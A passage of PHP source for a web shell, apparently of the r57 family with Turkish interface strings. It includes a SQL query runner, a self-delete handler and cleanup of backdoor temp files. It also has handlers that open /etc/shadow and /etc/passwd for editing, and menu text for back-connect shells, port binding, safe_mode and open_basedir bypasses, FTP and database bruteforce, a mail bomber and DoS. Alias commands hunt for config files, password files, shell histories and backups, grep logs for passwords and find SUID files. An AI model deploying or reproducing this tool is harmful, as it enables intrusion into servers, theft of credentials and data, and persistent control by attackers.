  1419.  
  1420. if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
  1421.  
  1422. else
  1423.  
  1424. {
  1425.  
  1426. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
  1427.  
  1428. else
  1429.  
  1430. {
  1431.  
  1432. foreach($querys as $num=>$query)
  1433.  
  1434. {
  1435.  
  1436. if(strlen($query)>5)
  1437.  
  1438. {
  1439.  
  1440. echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  1441.  
  1442. switch($sql->query($query))
  1443.  
  1444. {
  1445.  
  1446. case '0':
  1447.  
  1448. echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  1449.  
  1450. break;
  1451.  
  1452. case '1':
  1453.  
  1454. if($sql->get_result())
  1455.  
  1456. {
  1457.  
  1458. echo "<table width=100%>";
  1459.  
  1460. foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  1461.  
  1462. $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;",$sql->columns);
  1463.  
  1464. echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
  1465.  
  1466. for($i=0;$i<$sql->num_rows;$i++)
  1467.  
  1468. {
  1469.  
  1470. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  1471.  
  1472. $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
  1473.  
  1474. echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
  1475.  
  1476. }
  1477.  
  1478. echo "</table>";
  1479.  
  1480. }
  1481.  
  1482. break;
  1483.  
  1484. case '2':
  1485.  
  1486. $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  1487.  
  1488. echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  1489.  
  1490. break;
  1491.  
  1492. }
  1493.  
  1494. }
  1495.  
  1496. }
  1497.  
  1498. }
  1499.  
  1500. }
  1501.  
  1502. echo "<br><form name=form method=POST>";
  1503.  
  1504. echo in('hidden','db',0,$_POST['db']);
  1505.  
  1506. echo in('hidden','db_server',0,$_POST['db_server']);
  1507.  
  1508. echo in('hidden','db_port',0,$_POST['db_port']);
  1509.  
  1510. echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  1511.  
  1512. echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  1513.  
  1514. echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  1515.  
  1516. echo in('hidden','cmd',0,'db_query');
  1517.  
  1518. echo "<div align=center>";
  1519.  
  1520. echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
  1521.  
  1522. echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  1523.  
  1524. echo "</form>";
  1525.  
  1526. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();
  1527.  
  1528. }
  1529.  
  1530. if(isset($_GET['delete']))
  1531.  
  1532. {
  1533.  
  1534. @unlink(__FILE__);
  1535.  
  1536. }
  1537.  
  1538. if(isset($_GET['tmp']))
  1539.  
  1540. {
  1541.  
  1542. @unlink("/tmp/bdpl");
  1543.  
  1544. @unlink("/tmp/back");
  1545.  
  1546. @unlink("/tmp/bd");
  1547.  
  1548. @unlink("/tmp/bd.c");
  1549.  
  1550. @unlink("/tmp/dp");
  1551.  
  1552. @unlink("/tmp/dpc");
  1553.  
  1554. @unlink("/tmp/dpc.c");
  1555.  
  1556. @unlink("/tmp/prxpl");
  1557.  
  1558. @unlink("/tmp/grep.txt");
  1559.  
  1560. }
  1561.  
  1562. if(isset($_GET['phpini']))
  1563.  
  1564. {
  1565.  
  1566. echo $head;
  1567.  
  1568. function U_value($value)
  1569.  
  1570. {
  1571.  
  1572. if ($value == '') return '<i>no value</i>';
  1573.  
  1574. if (@is_bool($value)) return $value ?'TRUE': 'FALSE';
  1575.  
  1576. if ($value === null) return 'NULL';
  1577.  
  1578. if (@is_object($value)) $value = (array) $value;
  1579.  
  1580. if (@is_array($value))
  1581.  
  1582. {
  1583.  
  1584. @ob_start();
  1585.  
  1586. print_r($value);
  1587.  
  1588. $value = @ob_get_contents();
  1589.  
  1590. @ob_end_clean();
  1591.  
  1592. }
  1593.  
  1594. return U_wordwrap((string) $value);
  1595.  
  1596. }
  1597.  
  1598. function U_wordwrap($str)
  1599.  
  1600. {
  1601.  
  1602. $str = @wordwrap(@htmlspecialchars($str),100,'<wbr />',true);
  1603.  
  1604. return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!','$1$2<wbr />',$str);
  1605.  
  1606. }
  1607.  
  1608. if (@function_exists('ini_get_all'))
  1609.  
  1610. {
  1611.  
  1612. $r = '';
  1613.  
  1614. echo '<table width=100%>','<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
  1615.  
  1616. foreach (@ini_get_all() as $key=>$value)
  1617.  
  1618. {
  1619.  
  1620. $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  1621.  
  1622. }
  1623.  
  1624. echo $r;
  1625.  
  1626. echo '</table>';
  1627.  
  1628. }
  1629.  
  1630. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1631.  
  1632. die();
  1633.  
  1634. }
  1635.  
  1636. if(isset($_GET['cpu']))
  1637.  
  1638. {
  1639.  
  1640. echo $head;
  1641.  
  1642. echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
  1643.  
  1644. $cpuf = @file("cpuinfo");
  1645.  
  1646. if($cpuf)
  1647.  
  1648. {
  1649.  
  1650. $c = @sizeof($cpuf);
  1651.  
  1652. for($i=0;$i<$c;$i++)
  1653.  
  1654. {
  1655.  
  1656. $info = @explode(":",$cpuf[$i]);
  1657.  
  1658. if($info[1]==""){$info[1]="---";}
  1659.  
  1660. $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1661.  
  1662. }
  1663.  
  1664. echo $r;
  1665.  
  1666. }
  1667.  
  1668. else
  1669.  
  1670. {
  1671.  
  1672. echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1673.  
  1674. }
  1675.  
  1676. echo '</table>';
  1677.  
  1678. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1679.  
  1680. die();
  1681.  
  1682. }
  1683.  
  1684. if(isset($_GET['mem']))
  1685.  
  1686. {
  1687.  
  1688. echo $head;
  1689.  
  1690. echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
  1691.  
  1692. $memf = @file("meminfo");
  1693.  
  1694. if($memf)
  1695.  
  1696. {
  1697.  
  1698. $c = sizeof($memf);
  1699.  
  1700. for($i=0;$i<$c;$i++)
  1701.  
  1702. {
  1703.  
  1704. $info = explode(":",$memf[$i]);
  1705.  
  1706. if($info[1]==""){$info[1]="---";}
  1707.  
  1708. $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1709.  
  1710. }
  1711.  
  1712. echo $r;
  1713.  
  1714. }
  1715.  
  1716. else
  1717.  
  1718. {
  1719.  
  1720. echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1721.  
  1722. }
  1723.  
  1724. echo '</table>';
  1725.  
  1726. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">green</a> ]</b></font></div>";
  1727.  
  1728. die();
  1729.  
  1730. }
  1731.  
  1732. if(isset($_GET['dmesg(8)']))
  1733.  
  1734. {$_POST['cmd'] = 'dmesg(8)';}
  1735.  
  1736. if(isset($_GET['free']))
  1737.  
  1738. {$_POST['cmd'] = 'free';}
  1739.  
  1740. if(isset($_GET['vmstat']))
  1741.  
  1742. {$_POST['cmd'] = 'vmstat';}
  1743.  
  1744. if(isset($_GET['lspci']))
  1745.  
  1746. {$_POST['cmd'] = 'lspci';}
  1747.  
  1748. if(isset($_GET['lsdev']))
  1749.  
  1750. {$_POST['cmd'] = 'lsdev';}
  1751.  
  1752. if(isset($_GET['procinfo']))
  1753.  
  1754. {$_POST['cmd']='cat /proc/cpuinfo';}
  1755.  
  1756. if(isset($_GET['version']))
  1757.  
  1758. {$_POST['cmd']='cat /proc/version';}
  1759.  
  1760. if(isset($_GET['interrupts']))
  1761.  
  1762. {$_POST['cmd']='cat /proc/interrupts';}
  1763.  
  1764. if(isset($_GET['realise1']))
  1765.  
  1766. {$_POST['cmd'] = 'cat /etc/*realise';}
  1767.  
  1768. if(isset($_GET['service']))
  1769.  
  1770. {$_POST['cmd'] = 'service --status-all';}
  1771.  
  1772. if(isset($_GET['ifconfig']))
  1773.  
  1774. {$_POST['cmd'] = 'ifconfig';}
  1775.  
  1776. if(isset($_GET['w']))
  1777.  
  1778. {$_POST['cmd'] = 'w';}
  1779.  
  1780. if(isset($_GET['who']))
  1781.  
  1782. {$_POST['cmd'] = 'who';}
  1783.  
  1784. if(isset($_GET['uptime']))
  1785.  
  1786. {$_POST['cmd'] = 'uptime';}
  1787.  
  1788. if(isset($_GET['last']))
  1789.  
  1790. {$_POST['cmd'] = 'last -n 10';}
  1791.  
  1792. if(isset($_GET['psaux']))
  1793.  
  1794. {$_POST['cmd'] = 'ps -aux';}
  1795.  
  1796. if(isset($_GET['netstat']))
  1797.  
  1798. {$_POST['cmd'] = 'netstat -a';}
  1799.  
  1800. if(isset($_GET['lsattr']))
  1801.  
  1802. {$_POST['cmd'] = 'lsattr -va';}
  1803.  
  1804. if(isset($_GET['syslog']))
  1805.  
  1806. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
  1807.  
  1808. if(isset($_GET['fstab']))
  1809.  
  1810. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
  1811.  
  1812. if(isset($_GET['fdisk']))
  1813.  
  1814. {$_POST['cmd'] = 'fdisk -l';}
  1815.  
  1816. if(isset($_GET['df']))
  1817.  
  1818. {$_POST['cmd'] = 'df -h';}
  1819.  
  1820. if(isset($_GET['realise2']))
  1821.  
  1822. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
  1823.  
  1824. if(isset($_GET['hosts']))
  1825.  
  1826. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
  1827.  
  1828. if(isset($_GET['resolv']))
  1829.  
  1830. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
  1831.  
  1832. if(isset($_GET['systeminfo']))
  1833.  
  1834. {$_POST['cmd'] = 'systeminfo';}
  1835.  
  1836. if(isset($_GET['shadow']))
  1837.  
  1838. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
  1839.  
  1840. if(isset($_GET['passwd']))
  1841.  
  1842. {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
  1843.  
  1844. $lang=array(
  1845.  
  1846. 'tr_text1'=>'Komut Uygula',
  1847.  
  1848. 'tr_text2'=>'Server uzerinde komut calistir ',
  1849.  
  1850. 'tr_text3'=>'Komut istemi ',
  1851.  
  1852. 'tr_text4'=>'Calisma Dizini ',
  1853.  
  1854. 'tr_text5'=>'Servere Dosya Upload Et',
  1855.  
  1856. 'tr_text6'=>'Yerel Dosya ',
  1857.  
  1858. 'tr_text7'=>'Dizin Veya Dosya Bul ',
  1859.  
  1860. 'tr_text8'=>'Sec',
  1861.  
  1862. 'tr_butt1'=>'Uygula',
  1863.  
  1864. 'tr_butt2'=>'Yukle',
  1865.  
  1866. 'tr_text9'=>'Porta baglan /bin/bash',
  1867.  
  1868. 'tr_text10'=>'Port',
  1869.  
  1870. 'tr_text11'=>'Sifre Giris',
  1871.  
  1872. 'tr_butt3'=>'Baglan',
  1873.  
  1874. 'tr_text12'=>'Back-Connect',
  1875.  
  1876. 'tr_text13'=>'IP',
  1877.  
  1878. 'tr_text14'=>'Port',
  1879.  
  1880. 'tr_butt4'=>'Baglan',
  1881.  
  1882. 'tr_text15'=>'Uzaktan servere dosya yukle',
  1883.  
  1884. 'tr_text16'=>'ile',
  1885.  
  1886. 'tr_text17'=>'Uzak Dosya',
  1887.  
  1888. 'tr_text18'=>'Yerel Dosya',
  1889.  
  1890. 'tr_text19'=>'Exploits',
  1891.  
  1892. 'tr_text20'=>'Kullan',
  1893.  
  1894. 'tr_text21'=>'&nbsp;Yeni ad',
  1895.  
  1896. 'tr_text22'=>'datapipe',
  1897.  
  1898. 'tr_text23'=>'Yerel Port',
  1899.  
  1900. 'tr_text24'=>'Uzak Host',
  1901.  
  1902. 'tr_text25'=>'Uzak Port',
  1903.  
  1904. 'tr_text26'=>'Kullan',
  1905.  
  1906. 'tr_butt5'=>'Iste',
  1907.  
  1908. 'tr_text28'=>'Guvenlik Modunda Calis',
  1909.  
  1910. 'tr_text29'=>'Giris Yok ',
  1911.  
  1912. 'tr_butt6'=>'Degistir',
  1913.  
  1914. 'tr_text30'=>'Cat file',
  1915.  
  1916. 'tr_butt7'=>'Goster',
  1917.  
  1918. 'tr_text31'=>'Dosya Bulunamadi',
  1919.  
  1920. 'tr_text32'=>'PHP Kod Degerlendir ',
  1921.  
  1922. 'tr_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
  1923.  
  1924. 'tr_butt8'=>'Testet',
  1925.  
  1926. 'tr_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',
  1927.  
  1928. 'tr_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',
  1929.  
  1930. 'tr_text36'=>'Database[VeriTabani]',
  1931.  
  1932. 'tr_text37'=>'Kullanici',
  1933.  
  1934. 'tr_text38'=>'Sifre',
  1935.  
  1936. 'tr_text39'=>'Tablo',
  1937.  
  1938. 'tr_text40'=>'Dump database table[DB Tablosu dok]',
  1939.  
  1940. 'tr_butt9'=>'Dump',
  1941.  
  1942. 'tr_text41'=>'DB dosyalarini kaydet.[Dump filed]',
  1943.  
  1944. 'tr_text42'=>'Dosya Duzenle ',
  1945.  
  1946. 'tr_text43'=>'Dosya Duzenlemek icin',
  1947.  
  1948. 'tr_butt10'=>'Kaydet',
  1949.  
  1950. 'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',
  1951.  
  1952. 'tr_text45'=>'Dosya Kaydedildi',
  1953.  
  1954. 'tr_text46'=>'PHP info Goster()',
  1955.  
  1956. 'tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster',
  1957.  
  1958. 'tr_text48'=>'Temp dosylarini sil',
  1959.  
  1960. 'tr_butt11'=>'Dosya Duzenle',
  1961.  
  1962. 'tr_text49'=>'Server dan bu scripti sil',
  1963.  
  1964. 'tr_text50'=>'CPU bilgisini incele',
  1965.  
  1966. 'tr_text51'=>'Memory[hafiza] bilgisini incele]',
  1967.  
  1968. 'tr_text52'=>'Metni Bul ',
  1969.  
  1970. 'tr_text53'=>'Klasor Bul',
  1971.  
  1972. 'tr_text54'=>'Dosyalarda ki Metni Bul',
  1973.  
  1974. 'tr_butt12'=>'Bul',
  1975.  
  1976. 'tr_text55'=>'Dosya Bul ',
  1977.  
  1978. 'tr_text56'=>'Bulunmadi :( KeyCoder :)',
  1979.  
  1980. 'tr_text57'=>'Olustur/Sil Dosya/Dizin ',
  1981.  
  1982. 'tr_text58'=>'isim',
  1983.  
  1984. 'tr_text59'=>'Dosya',
  1985.  
  1986. 'tr_text60'=>'Dizin',
  1987.  
  1988. 'tr_butt13'=>'Olustur/Sil',
  1989.  
  1990. 'tr_text61'=>'Dosya Olustur',
  1991.  
  1992. 'tr_text62'=>'Dizin Olustur',
  1993.  
  1994. 'tr_text63'=>'Dosya Sil',
  1995.  
  1996. 'tr_text64'=>'Dizin Sil',
  1997.  
  1998. 'tr_text65'=>'Olustur',
  1999.  
  2000. 'tr_text66'=>'Sil',
  2001.  
  2002. 'tr_text67'=>'Chown/Chgrp/Chmod',
  2003.  
  2004. 'tr_text68'=>'Uygula',
  2005.  
  2006. 'tr_text69'=>'param1',
  2007.  
  2008. 'tr_text70'=>'param2',
  2009.  
  2010. 'tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  2011.  
  2012. 'tr_text72'=>'Metin Bul',
  2013.  
  2014. 'tr_text73'=>'Klasor Bul',
  2015.  
  2016. 'tr_text74'=>'Dosya Bul',
  2017.  
  2018. 'tr_text75'=>'* you can use regexp',
  2019.  
  2020. 'tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla',
  2021.  
  2022. 'tr_text80'=>'Cesit',
  2023.  
  2024. 'tr_text81'=>'Net',
  2025.  
  2026. 'tr_text82'=>'Databases',
  2027.  
  2028. 'tr_text83'=>'SQL Sorgusu Yap',
  2029.  
  2030. 'tr_text84'=>'SQL Sorgusu',
  2031.  
  2032. 'tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  2033.  
  2034. 'tr_text86'=>'Download files from server',
  2035.  
  2036. 'tr_butt14'=>'Download',
  2037.  
  2038. 'tr_text87'=>'Download files from remote ftp-server',
  2039.  
  2040. 'tr_text88'=>'server:port',
  2041.  
  2042. 'tr_text89'=>'File on ftp',
  2043.  
  2044. 'tr_text90'=>'Transfer mode',
  2045.  
  2046. 'tr_text91'=>'Archivation',
  2047.  
  2048. 'tr_text92'=>'without arch.',
  2049.  
  2050. 'tr_text93'=>'FTP',
  2051.  
  2052. 'tr_text94'=>'FTP-bruteforce',
  2053.  
  2054. 'tr_text95'=>'Users list',
  2055.  
  2056. 'tr_text96'=>'Can\'t get users list',
  2057.  
  2058. 'tr_text97'=>'checked: ',
  2059.  
  2060. 'tr_text98'=>'success: ',
  2061.  
  2062. 'tr_text99'=>'/etc/passwd',
  2063.  
  2064. 'tr_text100'=>'Send file to remote ftp server',
  2065.  
  2066. 'tr_text101'=>'Use reverse (user -> resu)',
  2067.  
  2068. 'tr_text102'=>'Mail',
  2069.  
  2070. 'tr_text103'=>'Send email',
  2071.  
  2072. 'tr_text104'=>'Send file to email',
  2073.  
  2074. 'tr_text105'=>'To',
  2075.  
  2076. 'tr_text106'=>'From',
  2077.  
  2078. 'tr_text107'=>'Subj',
  2079.  
  2080. 'tr_butt15'=>'Send',
  2081.  
  2082. 'tr_text108'=>'Mail',
  2083.  
  2084. 'tr_text109'=>'Hide',
  2085.  
  2086. 'tr_text110'=>'Show',
  2087.  
  2088. 'tr_text111'=>'SQL-Server : Port',
  2089.  
  2090. 'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
  2091.  
  2092. 'tr_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',
  2093.  
  2094. 'tr_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',
  2095.  
  2096. 'tr_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
  2097.  
  2098. 'tr_text116'=>'Copy from',
  2099.  
  2100. 'tr_text117'=>'to',
  2101.  
  2102. 'tr_text118'=>'File copied',
  2103.  
  2104. 'tr_text119'=>'Cant copy file',
  2105.  
  2106. 'tr_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
  2107.  
  2108. 'tr_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
  2109.  
  2110. 'tr_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',
  2111.  
  2112. 'tr_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
  2113.  
  2114. 'tr_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',
  2115.  
  2116. 'tr_text125'=>'Data',
  2117.  
  2118. 'tr_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
  2119.  
  2120. 'tr_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',
  2121.  
  2122. 'tr_text128'=>'Modify/Access date(touch)',
  2123.  
  2124. 'tr_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',
  2125.  
  2126. 'tr_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
  2127.  
  2128. 'tr_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
  2129.  
  2130. 'tr_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
  2131.  
  2132. 'tr_text133'=>'',
  2133.  
  2134. 'tr_text134'=>'Database-bruteforce',
  2135.  
  2136. 'tr_text135'=>'Dictionary',
  2137.  
  2138. 'tr_text136'=>'Creating evil symlink',
  2139.  
  2140. 'tr_text137'=>'Useful',
  2141.  
  2142. 'tr_text138'=>'Dangerous',
  2143.  
  2144. 'tr_text139'=>'Mail Bomber',
  2145.  
  2146. 'tr_text140'=>'DoS',
  2147.  
  2148. 'tr_text141'=>'Danger! Web-daemon crash possible.',
  2149.  
  2150. 'tr_err0'=>'Error! Can\'t write in file ',
  2151.  
  2152. 'tr_err1'=>'Error! Can\'t read file ',
  2153.  
  2154. 'tr_err2'=>'Error! Can\'t create ',
  2155.  
  2156. 'tr_err3'=>'Error! Can\'t connect to ftp',
  2157.  
  2158. 'tr_err4'=>'Error! Can\'t login on ftp server',
  2159.  
  2160. 'tr_err5'=>'Error! Can\'t change dir on ftp',
  2161.  
  2162. 'tr_err6'=>'Error! Can\'t sent mail',
  2163.  
  2164. 'tr_err7'=>'Mail send',
  2165.  
  2166. );
  2167.  
  2168. $aliases=array(
  2169.  
  2170. '----------------------------------locate'=>'',
  2171.  
  2172. 'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2173.  
  2174. 'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2175.  
  2176. 'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2177.  
  2178. 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2179.  
  2180. 'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2181.  
  2182. 'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2183.  
  2184. 'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2185.  
  2186. 'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2187.  
  2188. 'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
  2189.  
  2190. 'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2191.  
  2192. 'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
  2193.  
  2194. 'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2195.  
  2196. 'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2197.  
  2198. 'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2199.  
  2200. 'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2201.  
  2202. 'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2203.  
  2204. 'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2205.  
  2206. 'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2207.  
  2208. 'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2209.  
  2210. 'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',
  2211.  
  2212. 'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',
  2213.  
  2214. 'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',
  2215.  
  2216. '----------------------------------tar'=>'',
  2217.  
  2218. 'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',
  2219.  
  2220. '----------------------------------1'=>'',
  2221.  
  2222. 'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2223.  
  2224. 'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2225.  
  2226. 'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2227.  
  2228. 'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2229.  
  2230. 'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2231.  
  2232. '----------------------------------2'=>'',
  2233.  
  2234. 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',
  2235.  
  2236. '----------------------------------find'=>'',
  2237.  
  2238. 'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2239.  
  2240. 'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2241.  
  2242. 'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2243.  
  2244. 'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2245.  
  2246. 'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2247.  
  2248. 'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2249.  
  2250. 'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2251.  
